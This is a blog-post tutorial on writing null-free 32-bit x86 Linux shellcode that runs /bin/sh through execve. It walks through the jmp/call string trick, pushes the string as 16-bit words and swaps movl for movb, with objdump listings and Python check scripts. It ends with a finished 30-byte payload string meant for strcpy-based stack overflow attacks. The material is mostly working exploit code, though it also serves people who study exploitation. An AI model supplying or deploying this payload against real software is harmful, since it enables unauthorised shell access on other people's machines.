Thursday, February 26, 2009

asm: writing shellcode/getting rid of data section and nulls

Most likely you want your shellcode to execute "/bin/sh" on the target box. To do that you have to deal with a string, which in a normal program is stored in the data section.

The problem you face when writing shellcode is that you can't simply use a data section: your shellcode runs inside the target application, which has its own data section, so the string has to travel inside the shellcode itself.

First of all I tried to use the call instruction. When the processor executes call, it automatically pushes the address of the next instruction (the return address) onto the stack, so that address ends up in the memory esp points to. We can use this "feature", keeping in mind that call works with plain addresses: the target can be any labelled instruction, not only a function, and the bytes that follow the call do not have to be code at all.
Let's look at the code below.

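.global main

main:
    jmp     two             # skip ahead to the call
one:
    movl    (%esp), %ebx    # return address pushed by call = address of "/bin/sh"
    xor     %eax, %eax      # eax = 0

    pushl   %eax            # argv[1] = NULL
    pushl   %ebx            # argv[0] = address of "/bin/sh"
    movl    %esp, %ecx      # ecx = argv

    xorl    %edx, %edx      # edx = envp = NULL

    movl    $11, %eax       # 11 = execve syscall number
    int     $0x80
two:
    call    one             # pushes the address of the string below
    .string "/bin/sh"
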
At the very beginning the processor jumps to label two. There it executes call, which pushes the address of the next instruction onto the stack and jumps to label one. Here is the most interesting part: the "next instruction" after "call one" is actually our string.
So when we arrive at label one, the address of the string "/bin/sh" sits on top of the stack, at (%esp), and the first instruction loads it into ebx.
Then the code prepares the registers for the execve system call: the syscall number (11) goes to eax, the path to the executable to ebx, the argv array to ecx and the envp array to edx. I simulated the argv array by pushing a null and then the address of the string onto the stack and putting the address of the top of the stack into ecx. I don't pass any environment variables, so edx is null.
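
The claim that call leaves the address of the string on the stack can be replayed offline. The following is a minimal Python sketch, not part of the shellcode: it assumes the bytes and the load address (0x80483b4) that objdump reports for this listing further down in this post, and the helper names call_effects and c_string_at are made up for illustration.

```python
import struct

# Assumption: bytes and load address are taken from the objdump output of this
# listing shown later in the post; other builds will use other addresses.
BASE = 0x80483B4
CODE = bytes.fromhex(
    "eb12"              # jmp  two
    "8b1c24"            # mov  (%esp),%ebx
    "31c0" "50" "53"    # xor  %eax,%eax ; push %eax ; push %ebx
    "89e1" "31d2"       # mov  %esp,%ecx ; xor %edx,%edx
    "b80b000000"        # mov  $0xb,%eax
    "cd80"              # int  $0x80
    "e8e9ffffff"        # call one
    "2f62696e2f736800"  # "/bin/sh" plus terminator
)
CALL_OFFSET = 20  # offset of the call instruction (label two) inside CODE


def call_effects(code, base, call_offset):
    """Return (pushed return address, jump target) of a 5-byte `call rel32`."""
    assert code[call_offset] == 0xE8, "not a call rel32 opcode"
    return_addr = base + call_offset + 5          # address right after the call
    (rel32,) = struct.unpack_from("<i", code, call_offset + 1)
    return return_addr, return_addr + rel32       # target is relative to return_addr


def c_string_at(code, base, addr):
    """Read the NUL-terminated string stored at virtual address addr."""
    start = addr - base
    return code[start:code.index(b"\x00", start)]


return_addr, target = call_effects(CODE, BASE, CALL_OFFSET)
print(hex(return_addr), hex(target), c_string_at(CODE, BASE, return_addr))
```

With these inputs the pushed return address is 0x80483cd, the jump target is 0x80483b6 (label one), and the bytes stored at the return address spell /bin/sh.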

This code is valid and will execute /bin/sh if you compile and run it.
(~~) gcc test.s -o test 
(~~) ./test 
sh-3.2#
The problem here is that it contains nulls:
080483b4 <main>:
 80483b4: eb 12                 jmp    80483c8 <two>

080483b6 <one>:
 80483b6: 8b 1c 24              mov    (%esp),%ebx
 80483b9: 31 c0                 xor    %eax,%eax
 80483bb: 50                    push   %eax
 80483bc: 53                    push   %ebx
 80483bd: 89 e1                 mov    %esp,%ecx
 80483bf: 31 d2                 xor    %edx,%edx
 80483c1: b8 0b 00 00 00        mov    $0xb,%eax
 80483c6: cd 80                 int    $0x80

080483c8 <two>:
 80483c8: e8 e9 ff ff ff        call   80483b6 <one>
 80483cd: 2f                    das    
 80483ce: 62 69 6e              bound  %ebp,0x6e(%ecx)
 80483d1: 2f                    das    
 80483d2: 73 68                 jae    804843c <__libc_csu_init+0x4c>
 80483d4: 00 90 90 90 90 90     add    %dl,-0x6f6f6f70(%eax)
 80483da: 90                    nop    
 80483db: 90                    nop    
 80483dc: 90                    nop    
 80483dd: 90                    nop    
 80483de: 90                    nop    
 80483df: 90                    nop    
Almost all stack overflow attacks use a libc string function to copy the shellcode into the target and overwrite a function's return address. These functions stop at the first null character, so if the shellcode contains nulls it will not be copied to the end and the attack will fail.
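
To see how much of the first listing would survive such a copy, here is a small Python sketch. It only models the "stop at the first null" behaviour of a C string copy; strcpy_like and null_offsets are hypothetical helper names, and the bytes are the ones from the objdump output above.

```python
def strcpy_like(src):
    """Return the bytes a C-string copy would transfer: everything before the first NUL."""
    end = src.find(b"\x00")
    return src if end == -1 else src[:end]


def null_offsets(data):
    """List the offsets of all zero bytes in data."""
    return [i for i, b in enumerate(data) if b == 0]


# Machine code of the jmp/call version, copied from the objdump listing.
first_listing = bytes.fromhex(
    "eb12" "8b1c24" "31c0" "50" "53" "89e1" "31d2"
    "b80b000000" "cd80" "e8e9ffffff" "2f62696e2f736800"
)

copied = strcpy_like(first_listing)
print(len(first_listing), len(copied), null_offsets(first_listing))
```

Only the first 15 of the 33 bytes would be copied: the copy stops inside the mov $0xb,%eax instruction, before int $0x80 and the string are ever reached.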
The "main" null is the terminator of our string "/bin/sh"; execve does not work with strings that are not null-terminated. I tried to define the string as "/bin/shx" using .ascii, which does not append a terminator:
.ascii  "/bin/shx"
and to overwrite the last character with a null at runtime, but every time I got a segmentation fault. I suppose this is because the string lives in the code section of my test program, which is mapped read-only. This became a dead end for me.
I decided to try another way of defining the string. A string, after all, is just an array of bytes, so we can put these bytes somewhere else in some other representation.
Let's look at the string "/bin/sh" from the other side.
(~~) echo -n "/bin/sh" | hexdump 
0000000 622f 6e69 732f 0068
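Padded to a multiple of 4 bytes, the string still contains a null that would show up in a 4-byte immediate (the last dword is 0x0068732f). This is not a problem, though: we can divide the string into 2-byte chunks, exactly as hexdump prints them:
622f, 6e69, 732f, 68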
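
The same chunks can be derived without hexdump. This is a minimal Python sketch under the assumption that the target is little-endian x86, as in the rest of this post; to_le_words is a hypothetical helper name. Since the stack grows downwards, the words have to be pushed in reverse order so that the string reads forwards in memory.

```python
import struct


def to_le_words(text):
    """Split a string plus its NUL terminator into 16-bit little-endian words."""
    data = text.encode("ascii") + b"\x00"
    if len(data) % 2:
        data += b"\x00"  # pad to a whole number of words
    return list(struct.unpack("<%dH" % (len(data) // 2), data))


words = to_le_words("/bin/sh")
push_order = list(reversed(words))  # last word of the string is pushed first

print([hex(w) for w in words])
print([hex(w) for w in push_order])
```

For "/bin/sh" the words are 0x622f, 0x6e69, 0x732f and 0x68, so the pushes go 0x68, 0x732f, 0x6e69, 0x622f.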
Now we can use word-sized instructions. Let's look at the updated code of our shell program.
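
.global main

main:
    xor     %eax, %eax      # eax = 0

    pushl   %eax            # zero bytes after the string
    pushw   $0x68           # "h\0"
    pushw   $0x732f         # "/s"
    pushw   $0x6e69         # "in"
    pushw   $0x622f         # "/b"

    movl    %esp, %ebx      # ebx = address of "/bin/sh"

    pushl   %eax            # argv[1] = NULL
    pushl   %ebx            # argv[0] = address of "/bin/sh"
    movl    %esp, %ecx      # ecx = argv

    xorl    %edx, %edx      # edx = envp = NULL

    movl    $11, %eax       # 11 = execve; this encoding still contains zero bytes
    int     $0x80
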
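I pushed word-sized chunks of the string onto the stack in reverse order (first I pushed the zeroed eax so that the string is followed by zero bytes) and moved the address of the top of the stack into ebx. Note that the assembler encodes pushw $0x68 with a one-byte immediate (66 6a 68), so the zero high byte of that word never appears in the machine code. That's almost all. If you assemble this code, though, you will still find some zeros. They come from the movl $11, %eax instruction: 11 fits in a single byte, but movl takes a 4-byte immediate, so the value is padded with three zero bytes. Changing movl $11, %eax to movb $11, %al removes these last zeros, and since eax was already zeroed by the xor, the whole register still holds 11. The final code looks like this: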
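
.global main

main:
    xor     %eax, %eax      # eax = 0

    pushl   %eax            # zero bytes after the string
    pushw   $0x68           # "h\0"
    pushw   $0x732f         # "/s"
    pushw   $0x6e69         # "in"
    pushw   $0x622f         # "/b"

    movl    %esp, %ebx      # ebx = address of "/bin/sh"

    pushl   %eax            # argv[1] = NULL
    pushl   %ebx            # argv[0] = address of "/bin/sh"
    movl    %esp, %ecx      # ecx = argv

    xorl    %edx, %edx      # edx = envp = NULL

    movb    $11, %al        # 11 = execve; the rest of eax is still zero
    int     $0x80
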
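
To check what memory looks like by the time int $0x80 is reached, the pushes can be replayed on a toy stack. This is only a Python model of the listing above, not an emulator: the Stack class is made up for illustration and the initial esp value 0xbffff000 is an arbitrary assumption.

```python
import struct


class Stack:
    """Toy model of a downward-growing little-endian stack."""

    def __init__(self, top=0xBFFFF000, size=64):  # hypothetical initial esp
        self.mem = bytearray(size)
        self.base = top - size
        self.esp = top

    def push(self, value, width):
        """Model pushw (width=2) or pushl (width=4)."""
        self.esp -= width
        fmt = {2: "<H", 4: "<I"}[width]
        struct.pack_into(fmt, self.mem, self.esp - self.base, value)

    def read(self, addr, count):
        offset = addr - self.base
        return bytes(self.mem[offset:offset + count])


stack = Stack()
eax = 0                                   # xor %eax, %eax
stack.push(eax, 4)                        # pushl %eax
for word in (0x68, 0x732F, 0x6E69, 0x622F):
    stack.push(word, 2)                   # pushw $...
ebx = stack.esp                           # movl %esp, %ebx
stack.push(eax, 4)                        # pushl %eax
stack.push(ebx, 4)                        # pushl %ebx
ecx = stack.esp                           # movl %esp, %ecx

path = stack.read(ebx, 8)
argv = struct.unpack("<2I", stack.read(ecx, 8))
print(path, [hex(a) for a in argv])
```

In this model ebx points at the bytes of "/bin/sh" followed by a null, and ecx points at a two-element array holding the address of the string and a null pointer, which is the argv layout execve expects.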
Compiling it and dumping the machine code, I can see that there are no zeros in it:
080483b4 <main>:
 80483b4: 31 c0                 xor    %eax,%eax
 80483b6: 50                    push   %eax
 80483b7: 66 6a 68              pushw  $0x68
 80483ba: 66 68 2f 73           pushw  $0x732f
 80483be: 66 68 69 6e           pushw  $0x6e69
 80483c2: 66 68 2f 62           pushw  $0x622f
 80483c6: 89 e3                 mov    %esp,%ebx
 80483c8: 50                    push   %eax
 80483c9: 53                    push   %ebx
 80483ca: 89 e1                 mov    %esp,%ecx
 80483cc: 31 d2                 xor    %edx,%edx
 80483ce: b0 0b                 mov    $0xb,%al
 80483d0: cd 80                 int    $0x80
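
The b0 0b line is where the last zeros went away. The two encodings can be rebuilt by hand, as in the Python sketch below; it covers only these two forms of mov (opcode 0xb8 with a 4-byte immediate for eax, opcode 0xb0 with a 1-byte immediate for al), and the function names are made up for illustration.

```python
import struct


def mov_imm32_eax(value):
    """Encode `movl $value, %eax`: opcode 0xb8 plus a 4-byte little-endian immediate."""
    return b"\xb8" + struct.pack("<I", value)


def mov_imm8_al(value):
    """Encode `movb $value, %al`: opcode 0xb0 plus a 1-byte immediate."""
    return b"\xb0" + struct.pack("<B", value)


long_form = mov_imm32_eax(11)
short_form = mov_imm8_al(11)
print(long_form.hex(), short_form.hex())
```

The long form gives b8 0b 00 00 00 and the short form gives b0 0b, matching the two dumps in this post. The short form only writes the low byte of eax, so it is safe here only because eax was zeroed earlier and not modified since.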
The shellcode string looks like this:
"\x31\xc0\x50\x66\x6a\x68\x66\x68\x2f\x73\x66\x68\x69\x6e\x66"
"\x68\x2f\x62\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"

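Before using a string like this it is worth checking it mechanically instead of reading the dump by eye. A minimal Python sketch, with null_offsets as a hypothetical helper name and the bytes copied from the string above:

```python
def null_offsets(data):
    """List the offsets of all zero bytes in data."""
    return [i for i, b in enumerate(data) if b == 0]


shellcode = (
    b"\x31\xc0\x50\x66\x6a\x68\x66\x68\x2f\x73\x66\x68\x69\x6e\x66"
    b"\x68\x2f\x62\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"
)

print(len(shellcode), null_offsets(shellcode))
```

The string is 30 bytes long and the list of null offsets is empty.
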
2 comments:

Geronimo said...

i think you found my stupid program i did awhile back i was trying to understand how movl $11, %eax worked when i started this and could find very little information on this so i was taking a stab in the dark to see how it worked thanks i also learned some other things since then thanks for the information i will treasure it :)

Ni@m said...

Hi Geronimo,
I didn't get what program you are talking about.
Anyway I'm pleased that you've found this post useful for you. Thanks!